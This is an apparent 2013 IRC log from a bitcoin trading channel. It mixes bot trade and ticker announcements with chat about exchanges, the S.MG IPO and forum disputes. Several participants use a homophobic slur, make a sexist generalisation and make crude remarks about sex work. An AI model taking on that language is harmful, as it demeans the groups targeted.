[BASIC-MINING] 3 @ 0.65 = 1.95 BTC [-] Jun 10 06:30:48 [BTCTC] [BASIC-MINING] 1 @ 0.647999 BTC [-] Jun 10 06:30:50 [BTCTC] [BASIC-MINING] 1 @ 0.637999 BTC [-] Jun 10 06:30:51 [BTCTC] [BASIC-MINING] 2 @ 0.627999 = 1.256 BTC [-] Jun 10 06:30:53 [BTCTC] [BASIC-MINING] 2 @ 0.617999 = 1.236 BTC [-] Jun 10 06:32:02 [BTCTC] [BASIC-MINING] 1 @ 0.6 BTC [-] Jun 10 06:32:06 [BTCTC] [BASIC-MINING] 3 @ 0.6 = 1.8 BTC [-] Jun 10 06:33:14 [BTCTC] [GSDPT] 1 @ 0.002801 BTC [-] Jun 10 06:33:16 [BTCTC] [GSDPT] 5 @ 0.002801 = 0.014 BTC [-] Jun 10 06:33:17 [BTCTC] [GSDPT] 7 @ 0.002801 = 0.0196 BTC [-] Jun 10 06:33:21 [BTCTC] [GSDPT] 10 @ 0.0028 = 0.028 BTC [-] Jun 10 06:33:24 [BTCTC] [GSDPT] 4 @ 0.0027 = 0.0108 BTC [-] Jun 10 06:33:26 [BTCTC] [GSDPT] 155 @ 0.002605 = 0.4038 BTC [-] Jun 10 06:33:30 [BTCTC] [GSDPT] 7 @ 0.0026 = 0.0182 BTC [-] Jun 10 06:41:56 [BTCTC] [TAT.ASICMINER] 20 @ 0.024401 = 0.488 BTC [-] Jun 10 06:41:58 [BTCTC] [TAT.ASICMINER] 34 @ 0.0244 = 0.8296 BTC [-] Jun 10 06:42:00 [BTCTC] [TAT.ASICMINER] 344 @ 0.024399 = 8.3933 BTC [-] Jun 10 06:47:26 [BTCTC] [ASICMINER-PT] 2 @ 2.421006 = 4.842 BTC [-] Jun 10 06:47:27 [BTCTC] [ASICMINER-PT] 2 @ 2.421005 = 4.842 BTC [-] Jun 10 06:47:30 [BTCTC] [ASICMINER-PT] 2 @ 2.421004 = 4.842 BTC [-] Jun 10 06:47:32 [BTCTC] [ASICMINER-PT] 1 @ 2.421003 BTC [-] Jun 10 06:47:37 [BTCTC] [ASICMINER-PT] 2 @ 2.421002 = 4.842 BTC [-] Jun 10 06:47:41 [BTCTC] [ASICMINER-PT] 1 @ 2.408 BTC [-] Jun 10 06:47:44 [BTCTC] [ASICMINER-PT] 1 @ 2.40701 BTC [-] Jun 10 06:47:46 [BTCTC] [ASICMINER-PT] 1 @ 2.401 BTC [-] Jun 10 06:47:49 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [-] Jun 10 06:47:52 [BTCTC] [ASICMINER-PT] 1 @ 2.4 BTC [-] Jun 10 06:52:08 [HAVELOCK] [ASICM] 194 @ 0.023705 = 4.5988 BTC [-] Jun 10 06:52:09 [HAVELOCK] [ASICM] 10 @ 0.0237 = 0.237 BTC [-] Jun 10 06:52:11 [HAVELOCK] [ASICM] 73 @ 0.0237 = 1.7301 BTC [-] Jun 10 06:52:12 [HAVELOCK] [ASICM] 35 @ 0.023661 = 0.8281 BTC [-] Jun 10 06:52:13 [HAVELOCK] [ASICM] 988 @ 0.02366 = 23.3761 BTC [-] Jun 10 06:54:07 [HAVELOCK] [ASICM] 12 @ 0.02366 = 0.2839 BTC [-] Jun 10 06:54:08 [HAVELOCK] [ASICM] 277 @ 0.02365101 = 6.5513 BTC [-] Jun 10 06:54:09 [HAVELOCK] [ASICM] 82 @ 0.023651 = 1.9394 BTC [-] Jun 10 06:54:10 [HAVELOCK] [ASICM] 129 @ 0.02365003 = 3.0509 BTC [-] Jun 10 06:58:27 [BTCTC] [B.YABMC] 1 @ 0.014333 BTC [-] Jun 10 07:00:01 [BTCTC] [TAT.ASICMINER] 4 @ 0.024983 = 0.0999 BTC [+] Jun 10 07:00:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.024983 BTC [+] Jun 10 07:05:20 [HAVELOCK] [HIM] 1 @ 0.2992 BTC [+] Jun 10 07:08:05 [BTCTC] [CRYPTO-TRADE] 1 @ 0.189995 BTC [+] Jun 10 07:10:58 ;;ticker Jun 10 07:10:59 BTCUSD ticker | Best bid: 106.19000, Best ask: 107.34044, Bid-ask spread: 1.15044, Last trade: 107.34044, 24 hour volume: 180128.64995756, 24 hour low: 88.00000, 24 hour high: 110.63051, 24 hour vwap: 99.21308 Jun 10 07:11:06 ;;next Jun 10 07:11:06 expecting re-test of 88 | lower targets: 80, 67-72 | resistance: 100, 104 | #bitcoin [Mon, 10 Jun 2013 02:34:35 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 1 hour, 36 minutes, and 25 seconds ago Jun 10 07:11:27 Not very accurate, mr. Oracle. Jun 10 07:12:25 go to #bitcoin-analysis and tell him that lol. It did touch his 110 prediction this replaced Jun 10 07:12:55 louong: haha yes, i was just pointing that out Jun 10 07:13:07 it touched 110, and now the next one is ineffect: back down Jun 10 07:20:09 [HAVELOCK] [ASICM] 40 @ 0.0247 = 0.988 BTC [+] Jun 10 07:20:11 [HAVELOCK] [HIM] 8 @ 0.278 = 2.224 BTC [-] Jun 10 07:22:06 [BTCTC] [S.DICE-PT] 3 @ 0.002844 = 0.0085 BTC [+] Jun 10 07:22:06 [BTCTC] [S.DICE-PT] 47 @ 0.002844 = 0.1337 BTC [+] Jun 10 07:24:07 [HAVELOCK] [VTX] 1 @ 0.4398 BTC [+] Jun 10 07:27:38 [BTCTC] [S.MPOE-PT] 5 @ 0.000723 = 0.0036 BTC [-] Jun 10 07:28:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.024982 = 0.0749 BTC [-] Jun 10 07:28:13 [HAVELOCK] [HIM] 20 @ 0.2771 = 5.542 BTC [-] Jun 10 07:30:59 [HAVELOCK] [HIM] 5 @ 0.27700001 = 1.385 BTC [-] Jun 10 07:31:27 [HAVELOCK] [HIM] 10 @ 0.277 = 2.77 BTC [-] Jun 10 07:32:59 [BTCTC] [S.MPOE-PT] 74 @ 0.000724 = 0.0536 BTC [+] **** BEGIN LOGGING AT Mon Jun 10 15:21:36 2013 Jun 10 15:23:36 [BTCTC] [TAT.ASICMINER] 9 @ 0.024874 = 0.2239 BTC [+] Jun 10 15:25:27 https://bitcointalk.org/index.php?topic=228812.0 Jun 10 15:25:29 theymos wins. Jun 10 15:27:53 uh what? Jun 10 15:28:11 Lol mircea_popescu unfortunately I have to argue with MPOE-PR on her S.MG post. Jun 10 15:28:47 why unfortunately ? Jun 10 15:29:14 because hes afraid of the MP WRATH Jun 10 15:32:43 well then he'd better have a point now won't he. Jun 10 15:32:56 http://daphnecaruanagalizia.com/wp-content/uploads/2012/09/Brick-Top.jpg Jun 10 15:34:55 mircea_popescu: because she didn't do her homework on the game industry, and her PR makes me think of EA...PR Jun 10 15:35:13 PR on S.MG* Jun 10 15:36:27 PR for some definition thereof Jun 10 15:36:43 thestringpuller so argue Jun 10 15:37:29 http://img272.imagevenue.com/img.php?image=801287453_HPIM0959_123_398lo.JPG Jun 10 15:37:33 I'm not completely arguing just inquiring, and voicing concerns. lol Jun 10 15:37:35 this is possibly the worst boob job ever Jun 10 15:38:42 Diagnostics that give alternatives are a sign of extreme laziness and totally suck. For example: "Note: Trade completed and/or posted!" Jun 10 15:38:51 So which is it? Jun 10 15:39:34 Neil "wrong username or password". Jun 10 15:39:38 not always laziness. Jun 10 15:39:51 thestringpuller so go ahead, what. the more arguments the better. Jun 10 15:40:14 mircea_popescu: True, that one is better written "Incorrect credentials" Jun 10 15:40:25 But "it failed because of a, b or c" just sucks. Jun 10 15:40:44 except if you contemplate your software ever beeing used by low information idiots (such as for instance govt employees) Jun 10 15:40:54 lol Jun 10 15:40:58 and would prefer cutting out the 60% support calls asking what credentials would be Jun 10 15:41:11 Explains why their getting anything done takes 10x longer than a normal person I guess Jun 10 15:41:37 personally i would prefer "You suck." as an error message on the pw thing Jun 10 15:41:37 or what "incorrect" means Jun 10 15:41:48 maybe one day i'll be big enough to make that a standard. Jun 10 15:41:49 "Try again" Jun 10 15:41:52 [BTCTC] [BASIC-MINING] 1 @ 0.699999 BTC [+] Jun 10 15:44:01 You can thank me for one thing. Every diagnostic I wrote in my work on GCC was crystal clear. Unlike most GCC diagnostics. Jun 10 15:46:13 mircea_popescu: be a real man, just return HTTP 406 Jun 10 15:47:46 ya. that'll hold them for about a month Jun 10 15:48:15 Neil when i say my prayers once or twice a millenia i always include thanks for not having to ever read code if i don't want to. Jun 10 15:53:29 mircea_popescu: I'm not even going to ask which god you pray to. I think the answer might scare me. Jun 10 15:55:59 faggots pray satan Jun 10 15:56:11 real men pray cthulhu Jun 10 15:58:02 [HAVELOCK] [ASICM] 13 @ 0.0249 = 0.3237 BTC [+] Jun 10 15:58:31 davout frenchies omit prepositions Jun 10 15:58:35 english speakers pray to. Jun 10 16:00:40 [MPEX] [S.MPOE] 1932 @ 0.000727 = 1.4046 BTC [-] Jun 10 16:01:04 [MPEX] [S.MPOE] 8168 @ 0.00072846 = 5.9501 BTC [+] Jun 10 16:01:54 my name is cindy and i need a 0.12 BTC credit to buy a lipgloss for my date. my future boyfriend () will pay back 0.13 BTC in a week. Jun 10 16:02:21 lol Jun 10 16:02:32 scammertalk delivers. that's pretty much the history of women in society. Jun 10 16:03:03 is this the real darkweb? Jun 10 16:03:27 josh_mutch no, this is the fake one. Jun 10 16:03:35 we have an oil lamp. Jun 10 16:04:12 moodlightweb Jun 10 16:06:03 Journey from .15 btc to a motorcycle (32 btc) via sports betting Jun 10 16:06:11 that forum is being invaded or something ? Jun 10 16:16:09 http://www.bash.org/?244321 << this is the REAL darkweb Jun 10 16:33:50 [HAVELOCK] [VTX] 1 @ 0.4736 BTC [+] Jun 10 16:45:23 [BTCTC] [ASICMINER-PT] 4 @ 2.47421 = 9.8968 BTC [-] Jun 10 16:45:26 [BTCTC] [ASICMINER-PT] 6 @ 2.474 = 14.844 BTC [-] Jun 10 16:47:13 hey mircea_popescu Jun 10 16:47:19 hey mjr_ Jun 10 16:47:25 jesus god it's hailing :( Jun 10 16:47:54 whats new Jun 10 16:49:29 [BTCTC] [BITVPS] 5 @ 0.00072 = 0.0036 BTC [-] Jun 10 16:52:48 [HAVELOCK] [ASICM] 17 @ 0.0249 = 0.4233 BTC [+] Jun 10 16:59:03 [BTCTC] [DMS.PURCHASE] 4 @ 0.065258 = 0.261 BTC Jun 10 16:59:05 [BTCTC] [DMS.PURCHASE] 100 @ 0.065258 = 6.5258 BTC Jun 10 17:04:41 [HAVELOCK] [ASICM] 6 @ 0.02495 = 0.1497 BTC [+] Jun 10 17:04:42 [HAVELOCK] [ASICM] 14 @ 0.02499999 = 0.35 BTC [+] Jun 10 17:05:44 http://trilema.com/2013/kings-bounty-the-legend/ Jun 10 17:06:18 [HAVELOCK] [ASICM] 18 @ 0.02499999 = 0.45 BTC [+] Jun 10 17:08:11 [BTCTC] [DMS.PURCHASE] 100 @ 0.065258 = 6.5258 BTC Jun 10 17:08:30 Nice Jun 10 17:09:21 [BTCTC] [DMS.PURCHASE] 300 @ 0.065258 = 19.5774 BTC Jun 10 17:10:20 Oh, I was looking at the may statement, not the king's bounty post :P Jun 10 17:14:37 [BTCTC] [DMS.PURCHASE] 200 @ 0.065258 = 13.0516 BTC Jun 10 17:15:12 [BTCTC] [ASICMINER-PT] 2 @ 2.47421 = 4.9484 BTC [+] Jun 10 17:19:18 [BTCTC] [DMS.PURCHASE] 75 @ 0.065258 = 4.8944 BTC Jun 10 17:19:43 what's new Jun 10 17:20:42 [BTCTC] [DMS.PURCHASE] 10 @ 0.065258 = 0.6526 BTC Jun 10 17:20:49 jcpham the history you didn't know. Jun 10 17:20:50 mircea_popescu i have a new game called "flying airplanes" Jun 10 17:21:02 it costs $6800 Jun 10 17:21:05 to play Jun 10 17:21:59 lol Jun 10 17:31:41 [BTCTC] [DMS.PURCHASE] 50 @ 0.065258 = 3.2629 BTC Jun 10 17:38:11 [BTCTC] [ASICMINER-PT] 1 @ 2.4889 BTC [+] Jun 10 17:41:25 i'm meeting with russia today today, is it "charts and graphs and all the things" or "graphs and charts and all the things" Jun 10 17:41:36 just want to be preparedd Jun 10 17:50:02 [HAVELOCK] [ASICM] 1 @ 0.02495 BTC [-] Jun 10 17:50:05 ;;asks 11111111111111111 Jun 10 17:50:10 ;;bids 0 Jun 10 17:50:12 There are currently 126045.75 bitcoins offered at or under 1.11111111111e+16 USD, worth 3.19949801828e+12 USD in total. | Data vintage: 0.0399 seconds Jun 10 17:50:13 There are currently 22925986 bitcoins demanded at or over 0.0 USD, worth 11573258.8548 USD in total. | Data vintage: 0.0877 seconds Jun 10 17:50:30 ,,next Jun 10 17:50:35 ;;next Jun 10 17:50:36 expecting re-test of 88 | lower targets: 80, 67-72 | resistance: 110 | support: 100, 96-97 | #bitcoin [Mon, 10 Jun 2013 04:15:07 +0000] | tips: http://bit.ly/YnxUM4 | disclaimer: http://bit.ly/139er6E | this is not investment or trading advice | #bitcoin-analysis | https://twitter.com/BitcoinOracle | updated by OneFixt | 10 hours, 35 minutes, and 27 seconds ago Jun 10 17:52:56 [BTCTC] [ASICMINER-PT] 1 @ 2.47521 BTC [-] Jun 10 17:53:03 [BTCTC] [ASICMINER-PT] 3 @ 2.47521 = 7.4256 BTC [-] Jun 10 17:53:23 ;;eightball blue necktie ? Jun 10 17:53:23 Come again? Jun 10 17:53:46 ;;eightball red necktie ? Jun 10 17:53:46 The outlook is poor. Jun 10 17:53:50 [BTCTC] [ASICMINER-PT] 4 @ 2.47521 = 9.9008 BTC [-] Jun 10 17:53:54 [BTCTC] [ASICMINER-PT] 2 @ 2.475 = 4.95 BTC [-] Jun 10 17:55:14 [BTCTC] [ASICMINER-PT] 2 @ 2.47521 = 4.9504 BTC [+] Jun 10 17:57:46 [BTCTC] [DMS.PURCHASE] 50 @ 0.065258 = 3.2629 BTC Jun 10 18:00:28 mjr_: another rainy satoshi square? Jun 10 18:00:34 [BTCTC] [B.YABMC] 5 @ 0.0135 = 0.0675 BTC [+] Jun 10 18:00:35 [BTCTC] [B.YABMC] 10 @ 0.014336 = 0.1434 BTC [+] Jun 10 18:00:37 [BTCTC] [B.YABMC] 71 @ 0.014339 = 1.0181 BTC [+] Jun 10 18:00:38 [BTCTC] [B.YABMC] 14 @ 0.01434 = 0.2008 BTC [+] Jun 10 18:04:17 qxzn: looks like it :( Jun 10 18:04:22 sucks Jun 10 18:04:35 but this time we have a plan Jun 10 18:04:38 [BTCTC] [ASICMINER-PT] 5 @ 2.488 = 12.44 BTC [+] Jun 10 18:04:45 which involves shelter wifi and food Jun 10 18:05:44 oh nifty. details? Jun 10 18:07:02 jurov hey, how goes in mpex' first amphibious brokerage house ? Jun 10 18:07:06 underwater yet ? Jun 10 18:08:15 [BTCTC] [BASIC-MINING] 1 @ 0.699999 BTC [+] Jun 10 18:10:55 [HAVELOCK] [VTX] 4 @ 0.4737 = 1.8948 BTC [+] Jun 10 18:11:04 [BTCTC] [ASICMINER-PT] 2 @ 2.47521 = 4.9504 BTC [-] Jun 10 18:11:06 [BTCTC] [ASICMINER-PT] 2 @ 2.47521 = 4.9504 BTC [-] Jun 10 18:11:07 [BTCTC] [ASICMINER-PT] 4 @ 2.475 = 9.9 BTC [-] Jun 10 18:11:11 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [-] Jun 10 18:11:21 [BTCTC] [ASICMINER-PT] 1 @ 2.488 BTC [+] Jun 10 18:13:34 [BTCTC] [TAT.ASICMINER] 36 @ 0.024872 = 0.8954 BTC [-] Jun 10 18:14:25 [HAVELOCK] [ASICM] 33 @ 0.02495 = 0.8234 BTC [-] Jun 10 18:14:56 [BTCTC] [TAT.ASICMINER] 7 @ 0.024872 = 0.1741 BTC [-] Jun 10 18:16:52 [BTCTC] [S.DICE-PT] 4 @ 0.002799 = 0.0112 BTC [+] Jun 10 18:17:12 things just got a little tonal. Jun 10 18:17:12 [BTCTC] [S.DICE-PT] 2 @ 0.0028 = 0.0056 BTC [+] Jun 10 18:18:49 [HAVELOCK] [ASICM] 4 @ 0.0249 = 0.0996 BTC [-] Jun 10 18:21:38 like luke-jr tonal? Jun 10 18:21:46 aw shit Jun 10 18:22:16 ugh... Jun 10 18:22:20 fucking weather Jun 10 18:26:26 "a meteorolical condition best suited for sensual fornication" Jun 10 18:27:04 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.007005 = 0.1401 BTC Jun 10 18:27:08 [BTCTC] [TAT.VIRTUALMINE] 975 @ 0.007001 = 6.826 BTC [-] Jun 10 18:27:11 [BTCTC] [TAT.VIRTUALMINE] 135 @ 0.007 = 0.945 BTC [-] Jun 10 18:27:13 [BTCTC] [TAT.VIRTUALMINE] 18 @ 0.007 = 0.126 BTC [-] Jun 10 18:27:15 [BTCTC] [TAT.VIRTUALMINE] 753 @ 0.007 = 5.271 BTC [-] Jun 10 18:27:17 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.007 = 0.021 BTC [-] Jun 10 18:27:19 [BTCTC] [TAT.VIRTUALMINE] 10000 @ 0.007 = 70 BTC [-] Jun 10 18:27:21 [BTCTC] [TAT.VIRTUALMINE] 8096 @ 0.007 = 56.672 BTC [-] Jun 10 18:31:41 BTCUSD ticker | Best bid: 102.90701, Best ask: 103.89398, Bid-ask spread: 0.98697, Last trade: 102.27200, 24 hour volume: 87789.59633297, 24 hour low: 95.00000, 24 hour high: 110.63051, 24 hour vwap: 103.59887 Jun 10 18:33:53 davout google returns no hits Jun 10 18:34:59 ofc? Jun 10 18:35:00 of? Jun 10 18:35:23 [BITFUNDER] [DIVIDEND PAID] [TAT.VIRTUALMINE] 115,000 @ 0.00003223 Jun 10 18:37:11 Anyone selling PUT options on TAT.VIRTUALMINE? Jun 10 18:38:38 [HAVELOCK] [ASICM] 1 @ 0.024521 BTC [-] Jun 10 18:39:38 of your quote lol Jun 10 18:40:29 https://bitcointalk.org/index.php?topic=230138.0;all Jun 10 18:40:33 people have solutions. Jun 10 18:42:58 [BTCTC] [ASICMINER-PT] 1 @ 2.4889 BTC [+] Jun 10 18:45:30 thank god we have the bitcointalk think tank Jun 10 18:45:43 Namworld> Anyone selling PUT options on TAT.VIRTUALMINE? lol Jun 10 18:48:39 [HAVELOCK] [ASICM] 1 @ 0.024521 BTC [-] Jun 10 18:50:13 ;;ticker Jun 10 18:50:14 BTCUSD ticker | Best bid: 102.27701, Best ask: 102.98497, Bid-ask spread: 0.70796, Last trade: 102.27700, 24 hour volume: 83651.81522088, 24 hour low: 95.00000, 24 hour high: 110.63051, 24 hour vwap: 103.90265 Jun 10 18:54:23 Chaaaang-Noi: yeah, I'd short hashing bonds anytime. Jun 10 18:58:32 Any new yorkers...satoshi square will probably be held at EVR today Jun 10 18:58:41 [BTCTC] [PAJKA.BOND] 5 @ 0.077 = 0.385 BTC [+] Jun 10 18:59:52 [HAVELOCK] [ASICM] 19 @ 0.024521 = 0.4659 BTC [-] Jun 10 19:01:42 sure :) Jun 10 19:04:39 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.008 BTC [+] Jun 10 19:08:10 [BTCTC] [BASIC-MINING] 2 @ 0.706997 = 1.414 BTC [+] Jun 10 19:08:27 [HAVELOCK] [ASICM] 8 @ 0.024521 = 0.1962 BTC [-] Jun 10 19:10:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.024648 = 0.0493 BTC [-] Jun 10 19:10:56 [BTCTC] [TAT.ASICMINER] 11 @ 0.024647 = 0.2711 BTC [-] Jun 10 19:11:45 [BTCTC] [TAT.ASICMINER] 1 @ 0.024646 BTC [-] Jun 10 19:11:47 [BTCTC] [TAT.ASICMINER] 6 @ 0.024646 = 0.1479 BTC [-] Jun 10 19:14:20 [BTCTC] [TAT.ASICMINER] 14 @ 0.024648 = 0.3451 BTC [+] Jun 10 19:14:25 Chaaaang-Noi: I was thining about you today Jun 10 19:14:44 [BTCTC] [PAJKA.BOND] 5 @ 0.076 = 0.38 BTC [-] Jun 10 19:15:09 in the shower Jun 10 19:15:11 Cause I was on the forums, are you banned? Jun 10 19:15:24 not for a while now, no Jun 10 19:15:28 cause you have no new posts that I can see Jun 10 19:15:38 what forum? Jun 10 19:16:06 bitcoin talk Jun 10 19:16:41 https://bitcointalk.org/index.php?topic=174620.msg2430916#msg2430916 Jun 10 19:16:48 that was me today welcoming back supernode! Jun 10 19:17:11 if you cant see it, i dont know :/ Jun 10 19:17:49 thestringpuller can you see it? Jun 10 19:24:15 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0074 BTC [-] Jun 10 19:24:23 [BTCTC] [TAT.VIRTUALMINE] 99 @ 0.00735 = 0.7277 BTC [-] Jun 10 19:24:25 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.008 = 0.072 BTC [+] Jun 10 19:25:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00735 BTC [-] Jun 10 19:25:37 [BTCTC] [TAT.VIRTUALMINE] 99 @ 0.0073 = 0.7227 BTC [-] Jun 10 19:26:23 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0073 BTC [-] Jun 10 19:26:25 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0073 = 0.73 BTC [-] Jun 10 19:41:36 [HAVELOCK] [ASICM] 6 @ 0.024521 = 0.1471 BTC [-] Jun 10 19:42:14 [HAVELOCK] [ASICM] 22 @ 0.024521 = 0.5395 BTC [-] Jun 10 19:43:13 I see you welcoming back superchode Jun 10 19:44:04 [BTCTC] [ASICMINER-PT] 1 @ 2.4889 BTC [+] Jun 10 19:46:14 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.0074 = 1.48 BTC [+] Jun 10 19:47:11 [BTCTC] [TAT.VIRTUALMINE] 11 @ 0.008 = 0.088 BTC [+] Jun 10 19:47:24 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00735 = 0.735 BTC [-] Jun 10 19:47:27 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0073 BTC [-] Jun 10 19:47:28 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0073 = 0.73 BTC [-] Jun 10 19:47:30 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00725 = 0.725 BTC [-] Jun 10 19:47:31 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00725 = 0.725 BTC [-] Jun 10 19:47:33 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0072 = 0.72 BTC [-] Jun 10 19:47:34 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0072 = 0.72 BTC [-] Jun 10 19:47:36 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00715 = 0.715 BTC [-] Jun 10 19:47:39 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.00715 = 0.715 BTC [-] Jun 10 19:52:14 yeah, i ahve made many posts since being banned Jun 10 19:52:36 [BTCTC] [TAT.ASICMINER] 3 @ 0.024857 = 0.0746 BTC [+] Jun 10 19:52:58 [HAVELOCK] [ASICM] 4 @ 0.024521 = 0.0981 BTC [-] Jun 10 20:03:36 i was not sure if gret troll or just crazy Jun 10 20:03:46 turned out to be just crazy Jun 10 20:04:41 I forgot why you were banned anyway. so much BS going onn at that time Jun 10 20:04:51 you against Nefario? Jun 10 20:04:57 i was "trolling" theymos lol Jun 10 20:05:17 oh lol, while he was trying to unload his GLBSE shares Jun 10 20:05:30 you were making them look bad Jun 10 20:05:46 [HAVELOCK] [ASICM] 49 @ 0.024521 = 1.2015 BTC [-] Jun 10 20:06:44 yes i was making theymos look bad, but it was his fault Jun 10 20:06:58 he made himself look bad Jun 10 20:07:23 unloading shares of a company that went belly up 2 days later Jun 10 20:07:34 trying to at least Jun 10 20:08:41 and claimed he did not know about the fail on its way Jun 10 20:09:00 but i was banned for "trolling" lol Jun 10 20:14:03 [MPEX] [S.MPOE] 5772 @ 0.00072814 = 4.2028 BTC [-] Jun 10 20:16:41 you guys are ners Jun 10 20:16:42 nerds Jun 10 20:16:55 lol Jun 10 20:16:59 http://www.gizoogle.net/index.php?search=https%3A%2F%2Fbitcointalk.org%2Findex.php%3Ftopic%3D226796.0&se=Gizoogle+Dis+Shiznit Jun 10 20:17:02 take that! Jun 10 20:17:15 Chaaaang-Noi: aren't you a bitcoin-aire Jun 10 20:17:24 yes i have a btc Jun 10 20:17:30 you probably a billionaire with dat crypto wealth out there in Thailand Jun 10 20:17:35 all the opium and hookers in he world Jun 10 20:17:57 except goat lives in thailand and has more purchasing power Jun 10 20:18:01 i can live ore than comferatably out here Jun 10 20:18:03 nickel blow jobs etc. Jun 10 20:18:11 yea in japan Jun 10 20:18:16 with all the parasite's taxes Jun 10 20:18:23 nickel ? lol Jun 10 20:18:37 no one clicked my link, boo Jun 10 20:19:01 it's Jun 10 20:19:04 not working goat Jun 10 20:19:07 I thought it was a dead link Jun 10 20:19:17 really? Jun 10 20:19:18 hmm Jun 10 20:19:31 Ugh I hate having to argue with MPOE-PR Jun 10 20:19:40 use ignore Jun 10 20:19:44 No I need answers Jun 10 20:19:46 link works for me :/ Jun 10 20:19:50 since she's the public facing side Jun 10 20:19:51 of MG Jun 10 20:20:07 and that means anyone I send to MG will have to interact with her... Jun 10 20:20:16 MG? Jun 10 20:20:18 so /ignore is sort of infantile in nature Jun 10 20:20:19 S.MG Jun 10 20:20:20 MtGox? Jun 10 20:20:43 i dont even know what s.mg is Jun 10 20:20:49 it's his new game company Jun 10 20:20:54 oh Jun 10 20:20:59 yeah i ignored that Jun 10 20:21:05 He's raised upwards of 1 mil Jun 10 20:21:09 !ticker m S.MG Jun 10 20:21:10 [MPEX:S.MG] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: 0.0001 / 0.00010008 / 0.00010555 (82086555 shares, 8,215.67 BTC), 30D: 0.0001 / 0.00010008 / 0.00010555 (82086555 shares, 8,215.67 BTC) Jun 10 20:21:17 well close to 1 mil Jun 10 20:21:22 well... who knows how much of that was his own money Jun 10 20:21:38 that's more than enough to start a triple AAA title Jun 10 20:21:38 or people anting to flip it Jun 10 20:22:00 Who knows, anything conributed to the IPO is going to go to running the company Jun 10 20:22:04 yea it is usagi Jun 10 20:22:12 you can start something like GTA IV on 1 mil Jun 10 20:22:22 you couldn't finish it Jun 10 20:22:27 but starting is the hardest part Jun 10 20:23:03 s.mg will be a trainwreck i would have thought it to be a scam Jun 10 20:23:18 It could be, but if someone who is to be the next Miyamoto jumps on board it's a done deal if that designer can have creative freedom. Then S.MG becomes the bitcoin nintendo Jun 10 20:23:35 wait, USAGI knows a trainwreck when he/she sees one? Jun 10 20:23:47 everything with usagi is a trainwreck Jun 10 20:24:36 usagi: overcomplicates things Jun 10 20:24:48 not a trainwreck lol Jun 10 20:25:25 I disagree , maybe you have not seen enough history of his/er trainwreck past? Jun 10 20:25:38 TU.SILVER is okay, but it's nothing compared to something like Casascius. Jun 10 20:25:41 I can make a list off memory Jun 10 20:26:39 something with a market cap of $2 grand does not count Jun 10 20:26:44 lol Jun 10 20:26:51 usagi: you watching wwdc keynote? Jun 10 20:26:58 http://www.apple.com/apple-events/june-2013/ Jun 10 20:29:04 you've missed the first few minutes of it Jun 10 20:29:26 [BTCTC] [TAT.ASICMINER] 1 @ 0.02484 BTC [-] Jun 10 20:30:33 what is BMF? Jun 10 20:31:33 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.008 = 0.16 BTC [+] Jun 10 20:35:13 ah, thx Jun 10 20:35:15 before my time Jun 10 20:43:59 [HAVELOCK] [ASICM] 5 @ 0.024521 = 0.1226 BTC [-] Jun 10 20:48:45 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.008 = 0.048 BTC [+] Jun 10 20:49:02 usagi: you caused a lot of drama bro =/ Jun 10 20:50:08 add two parts human, one part bitcoin, reciple for drama. Jun 10 20:50:40 usagi, for your part, this would be a convo to have in a PM. Jun 10 20:51:04 second of all, don't worry too much about what other people think, if you are operating honestly it will be vindicated. Jun 10 20:51:41 sorry mate, shit happens and some people never forget. don't matter, you learned from it and things are going well, right? Jun 10 20:51:46 so no worries. Jun 10 20:52:10 but never expect anyone to 'back you'. Jun 10 20:52:17 [HAVELOCK] [ASICM] 5 @ 0.024521 = 0.1226 BTC [-] Jun 10 20:53:38 [BTCTC] [TAT.ASICMINER] 7 @ 0.0247 = 0.1729 BTC [-] Jun 10 20:54:44 mircea_popescu: coinbr is 100 meters above danube.. so no amphibians :) Jun 10 20:56:48 [BTCTC] [TAT.ASICMINER] 3 @ 0.024799 = 0.0744 BTC [+] Jun 10 20:57:43 [BTCTC] [BASIC-MINING] 3 @ 0.7 = 2.1 BTC [-] Jun 10 20:59:38 vox populi, vox dei: http://www.reddit.com/r/BitcoinStocks/wiki/rbs3 Jun 10 20:59:57 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.008 = 0.072 BTC [+] Jun 10 21:00:25 [BTCTC] [TAT.ASICMINER] 3 @ 0.0247 = 0.0741 BTC [-] Jun 10 21:00:27 [BTCTC] [TAT.ASICMINER] 3 @ 0.02466 = 0.074 BTC [-] Jun 10 21:00:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.02465 = 0.0493 BTC [-] Jun 10 21:00:30 [BTCTC] [TAT.ASICMINER] 4 @ 0.024643 = 0.0986 BTC [-] Jun 10 21:00:34 [BTCTC] [TAT.ASICMINER] 18 @ 0.02464 = 0.4435 BTC [-] Jun 10 21:00:38 [BTCTC] [TAT.ASICMINER] 23 @ 0.024628 = 0.5664 BTC [-] Jun 10 21:00:41 [BTCTC] [TAT.ASICMINER] 17 @ 0.024625 = 0.4186 BTC [-] Jun 10 21:00:51 [BTCTC] [PAJKA.BOND] 10 @ 0.0751 = 0.751 BTC [-] Jun 10 21:01:07 